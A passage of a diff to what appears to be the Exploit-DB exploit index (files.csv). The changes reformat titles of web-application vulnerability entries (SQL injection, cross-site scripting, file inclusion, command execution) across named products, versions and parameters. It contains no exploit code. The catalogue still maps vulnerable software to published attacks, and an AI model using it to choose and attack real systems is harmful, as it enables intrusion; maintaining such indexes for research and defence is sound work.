Muttis",jsp,webapps,0 @@ -33300,13 +33301,13 @@ id,file,description,date,author,platform,type,port 32679,platforms/jsp/webapps/32679.txt,"Openfire 3.6.2 - 'log.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 32680,platforms/jsp/webapps/32680.txt,"Openfire 3.6.2 - 'log.jsp' Directory Traversal",2009-01-08,"Federico Muttis",jsp,webapps,0 32683,platforms/asp/webapps/32683.txt,"Mavi Emlak - 'newDetail.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 -32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 - manuals_search.php manuals_search Parameter Cross-Site Scripting",2008-12-29,"Xia Shing Zee",php,webapps,0 +32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 - 'manuals_search.php?manuals_search' Cross-Site Scripting",2008-12-29,"Xia Shing Zee",php,webapps,0 32687,platforms/asp/webapps/32687.txt,"Madrese-Portal - 'haber.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 32689,platforms/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro - 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,php,webapps,0 32701,platforms/php/webapps/32701.txt,"WordPress Plugin XCloner 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Exploit",2014-04-05,Vulnerability-Lab,ios,webapps,0 -32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter Cross-Site Scripting",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - 'pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS - 'open_book.php' SQL Injection",2009-01-07,stylextra,php,webapps,0 @@ -33316,25 +33317,25 @@ id,file,description,date,author,platform,type,port 32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0 32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 - 'login.php' SQL Injection",2009-01-14,darkjoker,php,webapps,0 32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 -32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - '/modules/rss/handler_image.php i' Parameter Cross-Site Scripting",2009-01-15,waraxe,php,webapps,0 -32729,platforms/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 -32730,platforms/asp/webapps/32730.txt,"Active Bids - 'search' Parameter Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0 -32731,platforms/asp/webapps/32731.txt,"Active Bids - 'search' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 -32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' Parameter SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 +32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - '/modules/rss/handler_image.php?i' Cross-Site Scripting",2009-01-15,waraxe,php,webapps,0 +32729,platforms/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 +32730,platforms/asp/webapps/32730.txt,"Active Bids - 'search' Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0 +32731,platforms/asp/webapps/32731.txt,"Active Bids - 'search' SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 +32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 32733,platforms/php/webapps/32733.txt,"w3bcms - 'admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0 -32735,platforms/asp/webapps/32735.txt,"Blog Manager - 'ItemID' Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0 -32736,platforms/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Parameter Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps,0 +32735,platforms/asp/webapps/32735.txt,"Blog Manager - 'ItemID' SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0 +32736,platforms/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps,0 32741,platforms/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - search.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 32742,platforms/jsp/webapps/32742.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - swr.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 32746,platforms/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps,0 -32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module - 'url' Parameter SQL Injection",2009-01-23,"Sina Yazdanmehr",php,webapps,0 +32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module - 'url' SQL Injection",2009-01-23,"Sina Yazdanmehr",php,webapps,0 32748,platforms/asp/webapps/32748.txt,"BBSXP 5.13 - 'error.asp' Cross-Site Scripting",2009-01-23,arashps0,asp,webapps,0 32750,platforms/asp/webapps/32750.txt,"OBLOG - 'err.asp' Cross-Site Scripting",2009-01-23,arash.setayeshi,asp,webapps,0 32756,platforms/asp/webapps/32756.txt,"LDF - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 32757,platforms/php/webapps/32757.txt,"ConPresso CMS 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0 32758,platforms/asp/webapps/32758.txt,"Lootan - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 -32759,platforms/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Parameter Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps,0 +32759,platforms/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps,0 32760,platforms/php/webapps/32760.txt,"NewsCMSLite - Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' URI redirection",2009-01-28,buzzy,php,webapps,0 @@ -33354,16 +33355,16 @@ id,file,description,date,author,platform,type,port 32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 - 'login.asp' Multiple SQL Injections",2009-02-10,"Francesco Bianchino",asp,webapps,0 32802,platforms/php/webapps/32802.txt,"Clipbucket 1.7 - 'dwnld.php' Directory Traversal",2009-02-16,JIKO,php,webapps,0 -32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' Parameter SQL Injection",2008-10-01,r45c4l,php,webapps,0 -32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 +32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' SQL Injection",2008-10-01,r45c4l,php,webapps,0 +32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0 32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 -32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login['Username'] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 -32809,platforms/php/webapps/32809.txt,"Magento 1.2 - app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32808,platforms/php/webapps/32808.txt,"Magento 1.2 - 'app/code/core/Mage/Admin/Model/Session.php?login['Username']' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32809,platforms/php/webapps/32809.txt,"Magento 1.2 - 'app/code/core/Mage/Adminhtml/controllers/IndexController.php?email' Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection",2014-04-11,delme,php,webapps,0 32816,platforms/php/webapps/32816.txt,"Orooj CMS - 'news.php' SQL Injection",2009-02-25,Cru3l.b0y,php,webapps,0 -32818,platforms/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Parameter Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",java,webapps,0 +32818,platforms/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",java,webapps,0 32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 - 'index.php' SQL Injection",2009-02-26,Cru3l.b0y,php,webapps,0 32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown - HTTP Response Splitting / Cross-Site Scripting",2009-02-26,"Digital Security Research Group",java,webapps,0 32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 @@ -33375,7 +33376,7 @@ id,file,description,date,author,platform,type,port 32835,platforms/php/webapps/32835.txt,"Novaboard 1.0 - HTML Injection / Cross-Site Scripting",2009-03-03,"Jose Luis Zayas",php,webapps,0 32840,platforms/php/webapps/32840.txt,"Amoot Web Directory - Password Field SQL Injection",2009-03-05,Pouya_Server,php,webapps,0 32841,platforms/php/webapps/32841.txt,"CMSCart 1.04 - 'maindatafunctions.php' SQL Injection",2009-02-28,"John Martinelli",php,webapps,0 -32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 - 'fields_filter' Parameter Cross-Site Scripting",2009-03-06,"Dmitriy Evteev",php,webapps,0 +32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 - 'fields_filter' Cross-Site Scripting",2009-03-06,"Dmitriy Evteev",php,webapps,0 32843,platforms/php/webapps/32843.txt,"TinXCMS 3.5 - 'rss.php' SQL Injection",2009-03-06,"Dmitriy Evteev",php,webapps,0 32844,platforms/php/webapps/32844.txt,"PHORTAIL 1.2.1 - 'poster.php' Multiple HTML Injection Vulnerabilities",2009-03-09,"Jonathan Salwan",php,webapps,0 32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 - 'ID' Cookie SQL Injection",2009-03-10,x0r,php,webapps,0 @@ -33383,7 +33384,7 @@ id,file,description,date,author,platform,type,port 32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 - 'tiki-list_file_gallery.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps,0 32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 - 'tiki-listpages.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps,0 32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 - 'oscid' Session Fixation",2009-04-02,laurent.desaulniers,php,webapps,0 -32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting",2009-03-17,syniack,java,webapps,0 +32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Cross-Site Scripting",2009-03-17,syniack,java,webapps,0 32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass (1)",2014-04-14,"Yassin Aboukir",hardware,webapps,0 32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0 32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting",2009-03-31,"SCS team",java,webapps,0 @@ -33393,13 +33394,13 @@ id,file,description,date,author,platform,type,port 32867,platforms/php/webapps/32867.txt,"WordPress Plugin Quick Page/Post Redirect 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32868,platforms/php/webapps/32868.txt,"WordPress Plugin Twitget 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console - Command Injection (Metasploit)",2014-04-14,Metasploit,linux,webapps,10080 -32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0 +32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosures",2009-04-19,r0t,cgi,webapps,0 32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0 -32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0 +32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0 32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0 32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0 -32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Parameter Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0 +32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0 32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",asp,webapps,0 32883,platforms/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 @@ -33414,38 +33415,38 @@ id,file,description,date,author,platform,type,port 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0 32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness / Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0 -32910,platforms/php/webapps/32910.txt,"Phorum 5.2 - admin/badwords.php curr Parameter Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 -32911,platforms/php/webapps/32911.txt,"Phorum 5.2 - admin/banlist.php curr Parameter Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 -32912,platforms/php/webapps/32912.txt,"Phorum 5.2 - admin/users.php Multiple Parameter Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 -32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - versioncheck.php upgrade_available Parameter Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 +32910,platforms/php/webapps/32910.txt,"Phorum 5.2 - 'admin/badwords.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 +32911,platforms/php/webapps/32911.txt,"Phorum 5.2 - 'admin/banlist.php?curr' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 +32912,platforms/php/webapps/32912.txt,"Phorum 5.2 - 'admin/users.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,voodoo-labs,php,webapps,0 +32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - 'versioncheck.php?upgrade_available' Cross-Site Scripting",2009-04-16,voodoo-labs,php,webapps,0 32914,platforms/php/webapps/32914.php,"Geeklog 1.5.2 - 'usersettings.php' SQL Injection",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0 32924,platforms/php/webapps/32924.txt,"RazorCMS 0.3RC2 - Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0 32927,platforms/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 - MDS Connection Service Cross-Site Scripting",2009-04-16,"Ken Millar",java,webapps,0 32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Inclusion",2009-04-17,Drosophila,php,webapps,0 32930,platforms/php/webapps/32930.txt,"CMSimple 4.4/4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80 -32932,platforms/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 +32932,platforms/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 32933,platforms/php/webapps/32933.txt,"Online Contact Manager 3.0 - 'index.php' showGroup Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 -32934,platforms/php/webapps/32934.txt,"Online Contact Manager 3.0 - view.php id Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 -32935,platforms/php/webapps/32935.txt,"Online Contact Manager 3.0 - email.php id Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 -32936,platforms/php/webapps/32936.txt,"Online Contact Manager 3.0 - edit.php id Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 -32937,platforms/php/webapps/32937.txt,"Online Contact Manager 3.0 - delete.php id Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 +32934,platforms/php/webapps/32934.txt,"Online Contact Manager 3.0 - 'view.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 +32935,platforms/php/webapps/32935.txt,"Online Contact Manager 3.0 - 'email.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 +32936,platforms/php/webapps/32936.txt,"Online Contact Manager 3.0 - 'edit.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 +32937,platforms/php/webapps/32937.txt,"Online Contact Manager 3.0 - 'delete.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 32940,platforms/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x - HTTP Response Splitting",2009-04-21,"SCS team",java,webapps,0 32941,platforms/php/webapps/32941.txt,"PTCeffect 4.6 - Local File Inclusion / SQL Injection",2014-04-19,"walid naceri",php,webapps,0 32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Cross-Site Request Forgery",2014-04-20,"Rakesh S",hardware,webapps,0 32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 - 'admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,php,webapps,0 32950,platforms/php/webapps/32950.txt,"Flat Calendar 1.1 - 'add.php' HTML Injection",2009-04-22,ZoRLu,php,webapps,0 -32952,platforms/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Parameter Remote Command Execution",2009-04-23,SirGod,php,webapps,0 +32952,platforms/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,php,webapps,0 32953,platforms/asp/webapps/32953.vbs,"PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection",2009-04-24,anonymous,asp,webapps,0 32958,platforms/php/webapps/32958.txt,"MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 -32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery 1.4.21 - 'css' Parameter Cross-Site Scripting",2009-04-29,"Gerendi Sandor Attila",php,webapps,0 +32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery 1.4.21 - 'css' Cross-Site Scripting",2009-04-29,"Gerendi Sandor Attila",php,webapps,0 32966,platforms/php/webapps/32966.txt,"MyBB 1.4.5 - Multiple Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps,0 32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component - Multiple SQL Injections",2009-05-05,"RedTeam Pentesting",php,webapps,0 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0 -32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph sorter_value' Parameter SQL Injection",2014-04-22,chapp,php,webapps,80 +32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph?sorter_value' SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0 @@ -33460,56 +33461,56 @@ id,file,description,date,author,platform,type,port 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"WordPress Plugin Work-The-Flow 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 -33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php read' Parameter Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 +33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",php,webapps,443 -33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 +33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injections",2009-05-22,Securitylab.ir,php,webapps,0 33009,platforms/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps,0 33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting",2009-05-15,"Gerendi Sandor Attila",php,webapps,0 33014,platforms/php/webapps/33014.txt,"Achievo 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management / Authentication Bypass",2014-04-25,"Jared Bird",multiple,webapps,0 -33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module - 'query' Parameter Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps,0 +33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module - 'query' Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps,0 33022,platforms/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0 33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities",2014-04-26,JIKO,php,webapps,0 33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0 33048,platforms/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,java,webapps,0 33052,platforms/php/webapps/33052.txt,"Basic Analysis and Security Engine (BASE) 1.2.4 - 'readRoleCookie()' Authentication Bypass",2009-05-23,"Tim Medin",php,webapps,0 -33060,platforms/php/webapps/33060.txt,"phpMyAdmin 3.3.0 - 'db' Parameter Cross-Site Scripting",2009-05-30,r0t,php,webapps,0 +33060,platforms/php/webapps/33060.txt,"phpMyAdmin 3.3.0 - 'db' Cross-Site Scripting",2009-05-30,r0t,php,webapps,0 33061,platforms/php/webapps/33061.php,"Joomla! 1.5.x - Cross-Site Scripting / Information Disclosure",2009-06-01,"Juan Galiana Lara",php,webapps,0 33065,platforms/php/webapps/33065.txt,"Horde 3.1 - 'Passwd' Module Cross-Site Scripting",2009-06-05,anonymous,php,webapps,0 -33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Parameter Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps,0 +33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps,0 33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution",2014-04-28,LOTFREE,php,webapps,80 33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80 33075,platforms/php/webapps/33075.txt,"GeoCore MAX DB Ver. 7.3.3 - Time-Based Blind Injection",2014-04-28,Esac,php,webapps,80 33076,platforms/php/webapps/33076.txt,"WordPress Plugin iMember360 3.8.012 < 3.9.001 - Multiple Vulnerabilities",2014-04-28,"Everett Griffiths",php,webapps,80 -33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Parameter Cross-Site Scripting",2009-06-14,Moudi,php,webapps,0 +33085,platforms/php/webapps/33085.txt,"Scriptsez Easy Image Downloader - 'id' Cross-Site Scripting",2009-06-14,Moudi,php,webapps,0 33087,platforms/php/webapps/33087.txt,"PHPLive! 3.2.2 - 'request.php' SQL Injection",2009-06-16,boom3rang,php,webapps,0 33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple 